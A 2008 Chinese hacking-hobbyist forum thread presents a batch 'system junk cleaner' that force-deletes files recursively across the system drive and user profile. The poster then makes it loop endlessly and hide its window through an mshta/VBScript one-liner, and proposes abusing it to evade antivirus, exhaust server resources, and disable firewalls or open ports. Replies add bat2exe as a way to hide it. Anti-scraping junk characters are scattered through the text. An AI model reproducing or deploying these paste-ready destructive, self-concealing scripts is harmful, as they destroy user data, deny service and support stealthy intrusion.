Board logo

标题: 【原创】再谈垃圾清除的批处理和其流氓运用! [打印本页]

作者: 平湖秋月    时间: 2008-9-13 23:51     标题: 【原创】再谈垃圾清除的批处理和其流氓运用!

大家经常会看到这个垃圾清除的的BAT程序,也就是很多人所说的30秒清除所有的系统他及程序    说实话这个批处理效果确实不错 ,速度快而且不重不漏!系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊!
' c7 a/ B  B" a' ]9 Va.bat源代码如下:, c+ V( ?& o9 F$ v. W& H; {  ^" U1 Y
( e0 ^. ^3 G$ {) D0 ~4 u: N

& A' i5 d' I3 h% k===可以直接保存改名a.bat=====================
6 |6 e: @9 D& @+ Y! Z: H@echo off+ T: g( q6 X8 K8 ]4 \' F- r
echo 正在清除系统垃圾文件,请稍等...... ( Q9 X0 e; ^% `0 [3 y+ w
@del /f /s /q %systemdrive%\*.tmp
* T2 q0 B9 i& w' }8 P@del /f /s /q %systemdrive%\*._mp
; y1 }/ u6 R( W5 e$ ^7 [8 c5 [@del /f /s /q %systemdrive%\*.log
+ o: ]- t" e) H" A# j+ W@del /f /s /q %systemdrive%\*.gid
( U1 H4 o( r$ ^  t& ]5 n$ A@del /f /s /q %systemdrive%\*.chk
4 c9 q3 c. a5 E$ O@del /f /s /q %systemdrive%\*.old 6 g% r1 ^& B2 ?  \
@del /f /s /q %systemdrive%\recycled\*.*
, q9 Q! R5 k; s& D@del /f /s /q %windir%\*.bak & f  n, t. c2 u9 L0 N
@del /f /s /q %windir%\prefetch\*.*
$ N" E- d( b$ g. Y@rd /s /q %windir%\temp & md %windir%\temp
; g2 h# x  z6 X; |1 R' ?  R$ J@del /f /q %userprofile%\cookies\*.*
# P/ R1 d& R9 |9 `, E  Z@del /f /q %userprofile%\recent\*.*
) b- u4 w& ~+ S4 T@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" 0 ~5 z6 w9 q) [8 U. Z3 F
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*" 3 d9 k' p3 a% b( t% N/ Q; @3 U" q
@del /f /s /q "%userprofile%\recent\*.*" , ?# l. T/ B8 |+ N$ T* }) P3 p. ^
echo 清除系统LJ完成!

& r% `0 P3 p5 G8 }4 Z; u+ H: t0 G# K其实简单的一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!我的QQ:118122875),于是到网上找了一下,决定用VBS代码实现,于是又加上了下面的代码,其实也很简单,也就加了一句话进去:
) C3 }) V! u' B2 D# `7 L8 a/ y% B8 e4 l) ^$ z1 _& \  S
===可以直接保存改名为a.bat(一定要是a.bat哦具体说明原因你应该明白吧======
2 O. A5 x8 F+ `& Z! W$ P& \& v
@echo off
: e2 G& B2 M! v' P% fif "%1" == "h" goto begin
: Q6 S: k8 @: N$ G* a! n; B' m+ {mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
4 X+ i  T- e: c:begin  P3 j; q  W* B% u& y2 r
echo 正在清除系统垃圾文件,请稍等......
  ]7 ]9 b, P% O- Y9 J4 x: _- u@@del /f /s /q %systemdrive%\*.tmp 6 a, T$ J! b) d. Y/ B: b
@del /f /s /q %systemdrive%\*._mp
  g' c7 z7 J# M3 ?3 G@del /f /s /q %systemdrive%\*.log . }+ I' L4 E& C( [$ `  ?# s
@del /f /s /q %systemdrive%\*.gid
+ s' q) L8 j% b* R9 n@del /f /s /q %systemdrive%\*.chk / p% f* P6 f; b; b6 L7 A* H
@del /f /s /q %systemdrive%\*.old
1 H- T; W7 v/ j+ a9 R: G@del /f /s /q %systemdrive%\recycled\*.*
; o/ [* R( T9 I  h@del /f /s /q %windir%\*.bak ( n, [- N/ ]* E
@del /f /s /q %windir%\prefetch\*.* ! R. f2 b9 u+ o: ]4 K
@rd /s /q %windir%\temp & md %windir%\temp - d$ G5 }  P% e) T$ b+ N
@del /f /q %userprofile%\cookies\*.*
: n4 J2 L/ M2 P! p  m@del /f /q %userprofile%\recent\*.*
+ y3 K' S8 S' }+ E; ]@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" 9 F1 H' B6 n. u/ Y( C' n2 A, s+ a
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
* L5 W, a& b/ Y5 p@del /f /s /q "%userprofile%\recent\*.*"   T& {( E: _6 G% w* F+ o+ x/ x
echo 清除系统LJ完成!
# o8 e$ m6 ~7 q) r& ]3 Qcall a.bat

  N! b9 n2 V- {; z* Z- ?$ g运行看看!什么效果?
* k/ h/ X5 Z, S+ A! |对话框消失了!打开任务管理器查看显示CPU运用:100%    看进程里面cmd.exe占用CPU:99     本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的!
+ @; O2 s$ k. R' }
. o7 `4 Z& A% B你说,我们可以利用这个BAT做些什么:
8 z4 H' V, a: B! t; E/ ~. O5 m
' s3 R& T4 r" \* M. ~; {1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!* E3 Y! h& T. M0 x. O
2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?
6 u" C2 b$ B: Z: p* `3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?当然这些应用都是我个人的一些分析,没有真正的实验过,我想一个可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方和我联系啊!我的QQ:118122875 平湖秋月

作者: 上帝的爱    时间: 2008-9-14 05:03

想法非常不错
作者: 柔肠寸断    时间: 2008-9-14 17:34

打个岔,流氓的应用,呵呵
作者: 柔肠寸断    时间: 2008-9-14 17:38

现在来正经的回答下问题:
( Z1 \3 o2 G0 i, n1、在bat下隐藏对话框,可以使用一个参数的,但是我记不得了6 v9 l+ z7 F$ [0 Y! z/ s. T

; W$ y4 u- i, r9 G  N2 y" u. V4 G2、可以将bat转换成exe格式的文件啊,使用bat2exe,下次我找到了就发出来哈
作者: 问道小生    时间: 2008-9-14 19:03

其实这个批处理还有一个问题,就是把log文件一律也作为垃圾处理了~~~& D7 g5 R) U2 ]$ e
部分软件卸载是需要log文件的,删除了它,就会造成软件无法正常卸载,或者卸载不干净。因此,log文件并不是垃圾,不同软件计录的log文件有着不同的作用,有的甚至是非常重要的,不是可以随便删除的,例如:一张CD碟片就有一个log日志文件,它主要记录EAC对CD抓轨的各项参数。
作者: 平湖秋月    时间: 2008-9-15 21:43

楼上的你们说的都有道理 理论上是成立的 我有时间试试看




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2